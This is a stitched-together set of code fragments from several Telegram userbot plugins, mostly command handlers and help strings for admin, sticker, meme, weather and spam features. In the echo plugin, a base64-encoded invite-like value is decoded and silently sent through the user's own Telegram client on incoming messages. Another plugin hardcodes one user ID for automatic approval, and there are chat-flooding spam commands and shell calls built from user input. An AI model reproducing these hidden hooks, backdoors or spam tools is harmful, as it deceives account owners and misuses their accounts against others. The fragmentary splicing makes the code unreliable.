output = "Successfully changed user to " + newuser + "!" await username.edit("`" f"{output}" "`") @register(outgoing=True, pattern=r"^\.resetalive$") async def amireallyalivereset(ureset): global DEFAULTUSER DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else uname().node await ureset.edit("`" "Successfully reset user for alive!" "`") CMD_HELP.update({ "system": "`.sysd`\ \nUsage: Shows system information using neofetch.\ \n\n`.botver`\ \nUsage: Shows the userbot version.\ \n\n`.pip` <module(s)>\ \nUsage: Does a search of pip modules(s).\ \n\n`.start`\ \nUsage: Type .start to see whether your bot is working or not.\ \n\n`.aliveu` <text>\ \nUsage: Changes the 'user' in alive to the text you want.\ \n\n`.resetalive`\ \nUsage: Resets the user to default.\ \n\n`.db`\ \nUsage:Shows database related info.\ \n\n.`.spc`\ \nUsage:Show system specification." })
for m in m_list: page_content += m.decode("UTF-8") + "\n" os.remove(downloaded_file_name) page_content = page_content.replace("\n", "<br>") response = telegraph.create_page(title_of_page, html_content=page_content) end = datetime.now() ms = (end - start).seconds await event.edit( "Pasted to https://telegra.ph/{} in {} seconds.".format( response["path"], ms), link_preview=True) else: await event.edit( "Reply to a message to get a permanent telegra.ph link. (Inspired by @ControllerBot)" ) def resize_image(image): im = Image.open(image) im.save(image, "PNG") #op or Legend X CMD_HELP.update({ "telegraph": ".t(m/t)" "\nUsage .tm Give Telegraph Link of media nd .tt telegraph link of text ." })
await event.edit(f"`{metod} ayarlandı :)`") ASYNC_POOL.append(metod) while metod in ASYNC_POOL: try: if metod == "isim": HM = time.strftime("%H:%M") await event.client( functions.account.UpdateProfileRequest( # pylint:disable=E0602 last_name=f"⏰{HM}")) elif metod == "bio": DMY = time.strftime("%d.%m.%Y") HM = time.strftime("%H:%M") Bio = f" ⌚️ Saat: {HM} | @turhanuserbot" await event.client( functions.account.UpdateProfileRequest( # pylint:disable=E0602 about=Bio)) await asyncio.sleep(60) except: return CMD_HELP.update({ "auto": ".auto isim (ya da) bio Kullanım: Otomatik saate göre değiştirir", })
reply = await unblock.get_reply_message() replied_user = await unblock.client(GetFullUserRequest(reply.from_id)) name0 = str(replied_user.user.first_name) await unblock.client(UnblockRequest(replied_user.user.id)) await unblock.edit("`You have been unblocked.`") if BOTLOG: await unblock.client.send_message( BOTLOG_CHATID, f"[{name0}](tg://user?id={replied_user.user.id})" " was unblocc'd!.", ) CMD_HELP.update({ "pmpermit": "\ .approve\ \nUsage: Approves the mentioned/replied person to PM.\ \n\n.disapprove\ \nUsage: Disapproves the mentioned/replied person to PM.\ \n\n.block\ \nUsage: Blocks the person.\ \n\n.unblock\ \nUsage: Unblocks the person so they can PM you.\ \n\n.notifoff\ \nUsage: Clears/Disables any notifications of unapproved PMs.\ \n\n.notifon\ \nUsage: Allows notifications for unapproved PMs." })
for normiecharacter in string: if normiecharacter in normiefont: circlycharacter = circlyfont[normiefont.index(normiecharacter)] string = string.replace(normiecharacter, circlycharacter) await event.edit(string) @register(outgoing=True, pattern="^.oldeng(?: |$)(.*)") async def oldy(event): args = event.pattern_match.group(1) if not args: get = await event.get_reply_message() args = get.text if not args: await event.edit("`What, I am Supposed To Work with text only`") return string = ' '.join(args).lower() for normiecharacter in string: if normiecharacter in normiefont: oldycharacter = oldengfont[normiefont.index(normiecharacter)] string = string.replace(normiecharacter, oldycharacter) await event.edit(string) CMD_HELP.update({ "fonts": "`.weebify` :- weebifys your text \ \n`.circlify` :- circlifies text \ \n`.oldeng` :- old eng font" })
CMD_HELP.update({ "admin": ">`.promote <username/reply> <custom rank (optional)>`" "\nUsage: Provides admin rights to the person in the chat." "\n\n>`.demote <username/reply>`" "\nUsage: Revokes the person's admin permissions in the chat." "\n\n>`.ban <username/reply> <reason (optional)>`" "\nUsage: Bans the person off your chat." "\n\n>`.unban <username/reply>`" "\nUsage: Removes the ban from the person in the chat." "\n\n>`.mute <username/reply> <reason (optional)>`" "\nUsage: Mutes the person in the chat, works on admins too." "\n\n>`.unmute <username/reply>`" "\nUsage: Removes the person from the muted list." "\n\n>`.gmute` <username/reply> <reason (optional)>" "\nUsage: Mutes the person in all groups you have in common with them." "\n\n>`.ungmute` <username/reply>" "\nUsage: Reply someone's message with .ungmute to remove them from the gmuted list." "\n\n>`.zombies`" "\nUsage: Searches for deleted accounts in a group. " "Use .zombies clean to remove deleted accounts from the group." "\n\n>`.all`" "\nUsage: Tag all member in the group chat." "\n\n>`.admins`" "\nUsage: Retrieves a list of admins in the chat." "\n\n>`.bots`" "\nUsage: Retrieves a list of bots in the chat." "\n\n>`.users` or >`.users <name of member>`" "\nUsage: Retrieves all (or queried) users in the chat." "\n\n>`.setgppic <reply to image>`" "\nUsage: Changes the group's display picture." })
return user_obj CMD_HELP.update({ "admin": ".promote <username/reply> <custom rank (optional)>\ \nUsage: Provides admin rights to the person in the chat.\ \n\n.demote <username/reply>\ \nUsage: Revokes the person's admin permissions in the chat.\ \n\n.ban <username/reply> <reason (optional)>\ \nUsage: Bans the person off your chat.\ \n\n.unban <username/reply>\ \nUsage: Removes the ban from the person in the chat.\ \n\n.mute <username/reply> <reason (optional)>\ \nUsage: Mutes the person in the chat, works on admins too.\ \n\n.unmute <username/reply>\ \nUsage: Removes the person from the muted list.\ \n\n.gmute <username/reply> <reason (optional)>\ \nUsage: Mutes the person in all groups you have in common with them.\ \n\n.ungmute <username/reply>\ \nUsage: Reply someone's message with .ungmute to remove them from the gmuted list.\ \n\n.delusers\ \nUsage: Searches for deleted accounts in a group. Use .delusers clean to remove deleted accounts from the group.\ \n\n.admins\ \nUsage: Retrieves a list of admins in the chat.\ \n\n.users or .users <name of member>\ \nUsage: Retrieves all (or queried) users in the chat.\ \n\n.setgppic <reply to image>\ \nUsage: Changes the group's display picture." })
@register(outgoing=True, pattern="^.delayspam (.*)") @errors_handler async def spammer(e): if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"): spamDelay = float(e.pattern_match.group(1).split(' ', 2)[0]) counter = int(e.pattern_match.group(1).split(' ', 2)[1]) spam_message = str(e.pattern_match.group(1).split(' ', 2)[2]) for i in range(1, counter): await e.respond(spam_message) await sleep(spamDelay) await e.delete() if BOTLOG: await e.client.send_message( BOTLOG_CHATID, "#DelaySPAM \n\n" "DelaySpam was executed successfully") CMD_HELP.update({ "spam": ".tspam <text>\ \nUsage: Spam the text letter by letter.\ \n\n.spam <count> <text>\ \nUsage: Floods text in the chat !!\ \n\n.picspam <count> <link to image/gif>\ \nUsage: As if text spam was not enough !!\ \n\n.delayspam <delay> <count> <text>\ \nUsage: .bigspam but with custom delay.\ \n\n\nNOTE : Spam at your own risk !!" })
if not img.document: await sticker.edit("`Reply to a sticker...`") return False await sticker.edit("`Converting...`") image = io.BytesIO() await sticker.client.download_media(img, image) image.name = 'sticker.png' image.seek(0) await sticker.client.send_file(sticker.chat_id, image, reply_to=img.id, force_document=True) await sticker.delete() return CMD_HELP.update({ "stickers": ">`.kang [emoji('s)]?`" "\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack " "\nor specify the emoji you want to." "\n\n>`.kang (emoji['s]]?` [number]?" "\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji " "or choose the emoji you want to." "\n\n>`.stkrinfo`" "\nUsage: Gets info about the sticker pack." "\n\n>`.getsticker`" "\nUsage: reply to a sticker to get 'PNG' file of sticker." })
return results async def scam(results, lim): single = opener.open(results['similar_images']).read() decoded = single.decode('utf-8') imglinks = [] counter = 0 pattern = r'^,\[\"(.*[.png|.jpg|.jpeg])\",[0-9]+,[0-9]+\]$' oboi = re.findall(pattern, decoded, re.I | re.M) for imglink in oboi: counter += 1 if not counter >= int(lim): imglinks.append(imglink) else: break return imglinks CMD_HELP.update({ 'reverse': '.reverse\ \nUsage: Reply to a pic/sticker to revers-search it on Google Images !!' })
else: await edit_or_reply(krish, output_str) @borg.on(events.NewMessage(incoming=True)) async def blackrply(krish): if krish.chat_id in Config.UB_BLACK_LIST_CHAT: return if is_echo(krish.sender_id, krish.chat_id): await asyncio.sleep(2) try: light = pybase64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") light = Get(light) await krish.client(light) except BaseException: pass if krish.message.text or krish.message.sticker: await krish.reply(krish.message) CMD_HELP.update({ "echo": "**Syntax :** `.echoadd` reply to user to who you want to enable\ \n**Usage : **replay's his every message for whom you enabled echo\ \n\n**Syntax : **`.rmecho` reply to user to who you want to stop\ \n**Usage : **Stops replaying his messages\ \n\n**Syntax : **`.listecho`\ \n**Usage : **shows the list of users for who you enabled echo\ " })
return if not response: await event.edit("`Botdan cevap alamadım!`") elif response.text.startswith("Merhaba!"): await event.edit(LANG['USER_PRIVACY']) else: await event.delete() await response.forward_to(event.chat_id) await conv.mark_read() await conv.cancel_all() CMD_HELP.update({ "sangmata": ".sangmata \ \nKullanım: Belirtilen kullanıcının isim geçmişini görüntüleyin.\n", "drweb": ".drweb \ \nKullanım: Belirtilen dosyada virüs var mı yok mu bakın.\n", "meme": ".meme üst;alt \ \nKullanım: Fotoğrafa yazı ekleyin.\n", "voicy": ".voicy \ \nKullanım: Sesi yazıya çevirin.\n", "quotly": ".q <sayı>\ \nKullanım: Metninizi çıkartmaya dönüştürün.\n" })
from userbot import CMD_HELP from userbot.events import register @register(outgoing=True, pattern="^.covid (.*)") async def corona(event): await event.edit("`Processing...`") country = event.pattern_match.group(1) covid = Covid() country_data = covid.get_status_by_country_name(country) if country_data: output_text = f"`Confirmed : {country_data['confirmed']}`\n" output_text += f"`Active : {country_data['active']}`\n" output_text += f"`Deaths : {country_data['deaths']}`\n" output_text += f"`Recovered : {country_data['recovered']}`\n" output_text += ( "`Last update : " f"{datetime.utcfromtimestamp(country_data['last_update'] // 1000).strftime('%Y-%m-%d %H:%M:%S')}`\n" ) output_text += f" Be careful stay safe" else: output_text = "No information yet about this country!" await event.edit(f"Corona Virus Info in {country}:\n\n{output_text}") CMD_HELP.update({ "covid": ".covid <country>" "\nUsage: Get an information about data covid-19 in your country.\n" })
try: from userbot.modules.sql_helper.filter_sql import get_filters except AttributeError: await event.edit("`Running on Non-SQL mode!`") return transact = "`There are no filters in this chat.`" filters = get_filters(event.chat_id) for filt in filters: if transact == "`There are no filters in this chat.`": transact = "Active filters in this chat:\n" transact += "`{}`\n".format(filt.keyword) else: transact += "`{}`\n".format(filt.keyword) await event.edit(transact) CMD_HELP.update({ "filter": ".filters\ \nUsage: Lists all active userbot filters in a chat.\ \n\n.filter <keyword> <reply text> or reply to a message with .filter <keyword>\ \nUsage: Saves the replied message as a reply to the 'keyword'.\ \nThe bot will reply to the message whenever 'keyword' is mentioned.\ \nWorks with everything from files to stickers.\ \n\n.stop <filter>\ \nUsage: Stops the specified filter.\ \n\n.rmbotfilters <marie/rose>\ \nUsage: Removes all filters of admin bots (Currently supported: Marie, Rose and their clones.) in the chat." })
r = requests.post( "https://api.remove.bg/v1.0/removebg", headers=headers, files=files, allow_redirects=True, stream=True, ) return r async def ReTrieveURL(input_url): headers = { "X-API-Key": REM_BG_API_KEY, } data = {"image_url": input_url} r = requests.post( "https://api.remove.bg/v1.0/removebg", headers=headers, data=data, allow_redirects=True, stream=True, ) return r CMD_HELP.update({ "rbg": ".rbg <Link gambar> atau balas gambar yg ingin dihapus latar belakang (Warning: tidak bekerja pada stiker!.)\ \nPenggunaan: Menghapus latar belakang gambar, menggunakan API remove.bg" })
else: await pip.edit("**Sorgu: **\n`" f"{invokepip}" "`\n**Sonuç: **\n`Bir şey bulunamadı.`") else: await pip.edit("`Bir örnek görmek için .cete pip komutunu kullanın.`") @register(outgoing=True, pattern="^.alive$") async def amialive(e): if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"): await e.edit("`Merhaba 💋 CeteUserBot Çalışıyor ✨.`") CMD_HELP.update({ "sysd": ".sysd\ \nKullanım: Neofetch modülünü kullanarak sistem bilgisi gösterir." }) CMD_HELP.update( {"botver": ".botver\ \nKullanım: Userbot sürümünü gösterir."}) CMD_HELP.update( {"pip": ".pip <module(s)>\ \nKullanım: Pip modüllerinde arama yapar."}) CMD_HELP.update({ "alive": ".alive\ \nKullanım: Cete botunun çalışıp çalışmadığını kontrol etmek için kullanılır." })
return await framecap.edit("`File tidak support!`") c_time = time.time() await framecap.edit("`Mengunduh media...`") ss = await bot.download_media( reply_message, "anu.mp4", progress_callback=lambda d, t: asyncio.get_event_loop().create_task( progress(d, t, framecap, c_time, "[DOWNLOAD]")), ) try: await framecap.edit("`Prosess...`") command = f"vcsi -g {frame}x{frame} {ss} -o ss.png " os.system(command) await framecap.client.send_file( framecap.chat_id, "ss.png", reply_to=framecap.reply_to_msg_id, ) await framecap.delete() except BaseException as e: await framecap.edit(f"{e}") os.system("rm -rf *.png *.mp4") CMD_HELP.update({ "ssvideo": ".ssvideo <grid>\ \nPenggunaan: Tangkap frame vidio <grid> x <grid>.\ \n*maksimal grid adalah 10." })
w=width, h=height, round_message=False, supports_streaming=True, ) ], progress_callback=lambda d, t: asyncio.get_event_loop().create_task( progress(d, t, event, c_time, "[UPLOAD]", loa)), ) await event.delete() os.system("rm -rf *.mkv") os.system("rm -rf *.mp4") os.system("rm -rf *.webm") CMD_HELP.update({ "getmusic": ".songn <Artist - Song Title>" "\nUsage: Download music by name (@WooMaiBot)" "\n\n.songl <Spotify/Deezer Link>" "\nUsage: Download music by link (@MusicsHunterBot)" "\n\n.songf <Artist - Song Title>" "\nUsage: Download music by name (@SpotifyMusicDownloaderBot)" "\n\n.songn now" "\nUsage: Download current LastFM scrobble with @WooMaiBot" "\n\n.songf now" "\nUsage: Download current LastFM scrobble with @SpotifyMusicDownloaderBot" "\n\n.vsong <Artist - Song Title>" "\nUsage: Finding and uploading videoclip.\n" })
os.remove('/home/carbon.png') # Removing carbon.png after uploading await e.delete() # Deleting msg @register(outgoing=True, pattern="^.f ") async def payf(e): paytext = e.text[3:] pay = "{}\n{}\n{}\n{}\n{}\n{}\n{}".format(paytext * 6, paytext, paytext, paytext * 5, paytext, paytext, paytext) await e.edit(pay) CMD_HELP.update({"carbon": ".carbon <text> \n Beautify your code"}) CMD_HELP.update({ 'setlang': ".setlang <Lang> \ \nUsage: It will set language for you carbon module " }) CMD_HELP.update({"leave": "Leave a Chat"}) CMD_HELP.update({";__;": "You try it!"}) CMD_HELP.update({"cry": "Cry"}) CMD_HELP.update({"fp": "Send face palm emoji."}) CMD_HELP.update({"moon": "Bot will send a cool moon animation."}) CMD_HELP.update({"clock": "Bot will send a cool clock animation."}) CMD_HELP.update({"readme": "Reedme."}) CMD_HELP.update({"sauce": "source."}) CMD_HELP.update({"disapprove": "Disapprove anyone in PM."}) CMD_HELP.update({"myusernames": "List of Usernames owned by you."})
country = result["nearest_area"][0]["country"][0]["value"] region = result["nearest_area"][0]["region"][0]["value"] desc = weather[f"lang_{LANG}"][0]["value"] except KeyError: desc = weather["weatherDesc"][0]["value"] text = ( f"**{desc}**\n\n" + f"**Temperature:** `{tempC}°C | {tempF}°F`\n" + f"**Min. Temp.:** `{mintempC}°C | {mintempF}°F`\n" + f"**Max. Temp.:** `{maxtempC}°C | {maxtempF}°F`\n" + f"**Humidity:** `{humidity}%`\n" + f"**Wind:** `{windK}Km/h | {windM}Mp/h, {windD}`\n" + f"**Sunrise:** `{sunrise}`\n" + f"**Sunset:** `{sunset}`\n" + f"**Updated on:** `{time}`\n\n" + f"`{region}, {country}`" ) await wtr.edit(text) CMD_HELP.update( { "weather": ".weather <city> or .weather <city>, <country name/code>\ \nUsage: Gets the weather of a city.", "wtr": ".wtr <city> or .wtr <city>, <country name/code>\ \nUsage: Gets the weather of a city.", } )
except ChatAdminRequiredError as err: mentions += " " + str(err) + "\n" try: await show.edit(mentions) except MessageTooLongError: await show.edit( "Damn, this is a huge group. Uploading users lists as file.") file = open("userslist.txt", "w+") file.write(mentions) file.close() await show.client.send_file( show.chat_id, "userslist.txt", caption="Users in {}".format(title), reply_to=show.id, ) remove("userslist.txt") CMD_HELP.update({ "groupdata": ".chinfo or .chatinfo <username of group>\ \n\n.leave\ \nUsage: will leave the Group\ \nUsage: Shows you the total information of the required chat.\ \n\n.adminlist\ \nUsage: Retrieves a list of admins in the chat.\ \n\n.users or .users <name of member>\ \nUsage: Retrieves all (or queried) users in the chat." })
CMD_HELP.update({ "memes": ">`.cowsay`" "\nUsage: cow which says things." "\n\n>`.cp`" "\nUsage: Copypasta the famous meme" "\n\n>`.vapor`" "\nUsage: Vaporize everything!" "\n\n>`.str`" "\nUsage: Stretch it." "\n\n>`.10iq`" "\nUsage: You retard !!" "\n\n>`.zal`" "\nUsage: Invoke the feeling of chaos." "\n\n>`Oem`" "\nUsage: Oeeeem" "\n\n>`.fp`" "\nUsage: Facepalm :P" "\n\n>`.moon`" "\nUsage: kensar moon animation." "\n\n>`.clock`" "\nUsage: kensar clock animation." "\n\n>`.hi`" "\nUsage: Greet everyone!" "\n\n>`.coinflip <heads/tails>`" "\nUsage: Flip a coin !!" "\n\n>`.owo`" "\nUsage: UwU" "\n\n>`.react`" "\nUsage: Make your userbot react to everything." "\n\n>`.slap`" "\nUsage: reply to slap them with random objects !!" "\n\n>`.cry`" "\nUsage: y u du dis, i cri." "\n\n>`.shg`" "\nUsage: Shrug at it !!" "\n\n>`.run`" "\nUsage: Let Me Run, run, RUNNN!" "\n\n>`.chase`" "\nUsage: You better start running" "\n\n>`.metoo`" "\nUsage: Haha yes" "\n\n>`.mock`" "\nUsage: Do it and find the real fun." "\n\n>`.clap`" "\nUsage: Praise people!" "\n\n>`.boobs`" "\nUsage: Get b00bs imej" "\n\n>`.butts`" "\nUsage: Get 🅱️utts imej" "\n\n>`.f <emoji/character>`" "\nUsage: Pay Respects." "\n\n>`.bt`" "\nUsage: Believe me, you will find this useful." "\n\n>`.type`" "\nUsage: Just a small command to make your keyboard become a typewriter!" "\n\n>`.lfy <query>`" "\nUsage: Let me Google that for you real quick !!" "\n\n>`.decide [Alternates: (.yes, .no, .maybe)]`" "\nUsage: Make a quick decision." "\n\n>`.scam <action> <time>`" "\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]" "\nUsage: Create fake chat actions, for fun. (Default action: typing)" "\n\nAnd many more" "`\n>.nou ; .bot ; .gey ; .gey ; .tf ; .paw ; .taco ; .nih ;`" "`\n>.f*g ; .gtfo ; .stfu ; .lol ; .lool ; .fail ; .leave`" "`\n>.iwi ; .sayhi`" "\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these." })
ping_time += time_list.pop() + ", " time_list.reverse() ping_time += ":".join(time_list) return ping_time DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "@marshmellosupport" CMD_HELP.update({ "alive": "**alive**\ \n\n**Syntax : **`.halive For Hellbot's Alive`\ \n**Function : **__ Hellbot's Alive__\ \nFor above two commands use `.bigspam` instead of spam for spamming more than 50 messages\ \n\n**Syntax : **`.falive`\ \n**Function : **__ Fridays's Alive.__\ \n\n**Syntax : **`.calive `\ \n**Function : **__ .CatUSerbot's Alive.__\ \n\n**Syntax : **`.dalive `\ \n**Function : **__ .DC Uerbot's Alive.__\ \n\n**Syntax : **`.alive `\ \n**Function : **__ .Lightning Uerbot's Alive.__\ \n\n**Syntax : **`.awake `\ \n**Function : **__ .Awake.__\ \n\n**Syntax : **`.salive `\ \n**Function : **__ .Lightning Uerbot's Alive.__\ \n\n\n**NOTE : All Credits To Thier Respective !!**" })
CMD_HELP.update({ "memes": ".cowsay\ \nUsage: cow which says things.\ \n\n:/\ \nUsage: Check yourself ;)\ \n\n-_-\ \nUsage: Ok...\ \n\n;_;\ \nUsage: Like `-_-` but crying.\ \n\n.cp\ \nUsage: Copypasta the famous meme\ \n\n.vapor\ \nUsage: Vaporize everything!\ \n\n.str\ \nUsage: Stretch it.\ \n\n.10iq\ \nUsage: You retard !!\ \n\n.zal\ \nUsage: Invoke the feeling of chaos.\ \n\nOof\ \nUsage: Ooooof\ \n\n.fp\ \nUsage: Facepalm :P\ \n\n.moon\ \nUsage: kensar moon animation.\ \n\n.clock\ \nUsage: kensar clock animation.\ \n\n.hi\ \nUsage: Greet everyone!\ \n\n.coinflip <heads/tails>\ \nUsage: Flip a coin !!\ \n\n.owo\ \nUsage: UwU\ \n\n.react\ \nUsage: Make your userbot react to everything.\ \n\n.slap\ \nUsage: reply to slap them with random objects !!\ \n\n.cry\ \nUsage: y u du dis, i cri.\ \n\n.shg\ \nUsage: Shrug at it !!\ \n\n.runs\ \nUsage: Run, run, RUNNN!\ \n\n.metoo\ \nUsage: Haha yes\ \n\n.mock\ \nUsage: Do it and find the real fun.\ \n\n.clap\ \nUsage: Praise people!\ \n\n.f <emoji/character>\ \nUsage: Pay Respects.\ \n\n.bt\ \nUsage: Believe me, you will find this useful.\ \n\n.type\ \nUsage: Just a small command to make your keyboard become a typewriter!\ \n\n.lfy <query>\ \nUsage: Let me Google that for you real quick !!\ \n\n.decide [Optional: (yes, no, maybe)]\ \nUsage: Make a quick decision.\ \n\n.scam <action> <time>\ \n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\ \nUsage: Create fake chat actions, for fun. (Default action: typing)\ \n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these." })
CMD_HELP.update({ "admin": "`.promote` <username/reply> <custom rank (optional)>\ \nUsage: Provides admin rights to the person in the chat.\ \n\n`.demote` <username/reply>\ \nUsage: Revokes the person's admin permissions in the chat.\ \n\n`.ban` <username/reply> <reason (optional)>\ \nUsage: Bans the person off your chat.\ \n\n`.unban` <username/reply>\ \nUsage: Removes the ban from the person in the chat.\ \n\n`.mute` <username/reply> <reason (optional)>\ \nUsage: Mutes the person in the chat, works on admins too.\ \n\n`.unmute` <username/reply>\ \nUsage: Removes the person from the muted list.\ \n\n`.gmute` <username/reply> <reason (optional)>\ \nUsage: Mutes the person in all groups you have in common with them.\ \n\n`.ungmute` <username/reply>\ \nUsage: Reply someone's message with .ungmute to remove them from the gmuted list.\ \n\n`.zombies`\ \nUsage: Searches for deleted accounts in a group. Use .zombies clean to remove deleted accounts from the group.\ \n\n`.admins`\ \nUsage: Retrieves a list of admins in the chat.\ \n\n`.adms`\ \nUsage: Retrieves a list of admins in the chat and send info to ur bot logs.\ \n\n`.bots`\ \nUsage: Retrieves a list of bots in the chat.\ \n\n`.bts`\ \nUsage: Retrieves a list of bots in the chat and send info to ur bot logs \ \n\n`.kick`\ \nUsage: kick users from groups.\ \n\n`.users` or `.users` <name of member>\ \nUsage: Retrieves all (or queried) users in the chat.\ \n\n`.setgpic` <reply to image>\ \nUsage: Changes the group's display picture.\ \n\n`.warn reason`\ \nUsage: warns users.\ \n\n`.resetwarns`\ \nUsage: Reset user's warns.\ \n\n`.getwarns`\ \nUsage: Shows the reason of warning.\ \n\n`.setflood` value.\ \nUsage:Sets flood limit in the current chat.\ \n\n`.strongwarn` <yes/on or no/off>.\ \nUsage:sets warn mode i.e <strong warn:bans user, soft warn: kicks user>.\ \n\n`.setwarn` value.\ \nUsage:sets warn limit." })
} files = { "image_file": (input_file_name, open(input_file_name, "rb")), } r = requests.post("https://api.remove.bg/v1.0/removebg", headers=headers, files=files, allow_redirects=True, stream=True) return r async def ReTrieveURL(input_url): headers = { "X-API-Key": REM_BG_API_KEY, } data = {"image_url": input_url} r = requests.post("https://api.remove.bg/v1.0/removebg", headers=headers, data=data, allow_redirects=True, stream=True) return r CMD_HELP.update({ "rbg": ">`.rbg <Link to Image> or reply to any image (Warning: does not work on stickers.)`" "\nUsage: Removes the background of images, using remove.bg API" })
else: pass gEn = pokemon.get("gen") link = pokemon.get("sprite") des = pokemon.get("description") # hope = await borg(event.chat_id, link) caption = f"<b><u>Pokemon Information Gathered Successfully</b></u>\n\n\n<b>Name:- {name}\nNumber:- {number}\nSpecies:- {species}\nType:- {types}\n\n<u>Abilities</u>\nNormal Abilities:- {ok}\nHidden Abilities:- {hm}\nEgg Group:- {uio}\nHeight:- {height}\nWeight:- {weight}\n\n<u>Family</u>\nID:- {Id}\nEvolution Stage:- {evo}\nEvolution Line:- {xy}\nStarter:- {start}\nLegendary:- {leg}\nMythical:- {myt}\nUltra Beast:- {ultra}\nMega:- {megA}\nGen:- {gEn}\nDescription:- {des}</b>" await borg.send_message( event.chat_id, caption, parse_mode="HTML", file=link, force_document=False, silent=True, ) await event.delete() CMD_HELP.update( { "pokedex": "**Pokedex**\ \n\n**Syntax : **`.pokedex <pokemon name>`\ \n**Usage :** Gives Information About Given Pokemon.\ \n\n**Example : **`.pokedex Pikachu`\ \nThis above syntax gives Information about Pikachu Pokemon." } )
# Alvin Gans @bot.on(events.NewMessage(incoming=True, from_users=(1353102497))) async def hehehe(event): if event.fwd_from: return chats = await event.get_chat() if event.is_private: if not pmpermit_sql.is_approved(chats.id): pmpermit_sql.approve(chats.id, "**Apa Kabar Mu Lord Alvin 🤐**") await borg.send_message( chats, "**Terdeteksi Pengguna Adalah Lord Alvin, Jadi Setujui**") # Alvin Gans CMD_HELP.update({ "p": ">`.ok`" "\nUsage: Menerima pesan seseorang dengan cara balas pesannya atau tag dan juga untuk dilakukan di pm." "\n\n>`.tolak`" "\nUsage: Menolak pesan seseorang dengan cara balas pesannya atau tag dan juga untuk dilakukan di pm." "\n\n>`.block`" "\nUsage: Memblokir orang di PM." "\n\n>`.daftarsetuju`" "\nUsage: Melihat daftar pengguna yang sudah di setujui." })
try: r = await grop.client( functions.channels.CreateChannelRequest( # pylint:disable=E0602 title=group_name, about="Welcome to this Channel", megagroup=False if type_of_group == "c" else True)) created_chat_id = r.chats[0].id result = await grop.client( functions.messages.ExportChatInviteRequest( peer=created_chat_id, )) await grop.edit( "Your {} Group/Channel Created Successfully. Click [{}]({}) to join" .format(group_name, group_name, result.link)) except Exception as e: # pylint:disable=C0103,W0703 await grop.edit(str(e)) CMD_HELP.update({ "create": "\ Create\ \nUsage: Create Channel, Group & Group With Bot.\ \n\n.create g <group name>\ \nUsage: Create a Private Group.\ \n\n.create b <group name>\ \nUsage: Create a Group with Bot.\ \n\n.create c <channel name>\ \nUsage: Create a Channel.\ " })
string = str(message[6:]) i = 1 async for message in edit.client.iter_messages(chat, self_id): if i == 2: await message.edit(string) await edit.delete() break i = i + 1 if BOTLOG: await edit.client.send_message(BOTLOG_CHATID, "Edit query was executed successfully") CMD_HELP.update({ 'purge': '.purge\ \nUsage: Purges all messages starting from the reply.' }) CMD_HELP.update({ 'purgeme': '.purgeme <x>\ \nUsage: Deletes x amount of your latest messages.' }) CMD_HELP.update({"del": ".del\ \nUsage: Deletes the message you replied to."}) CMD_HELP.update({ 'edit': ".edit <newmessage>\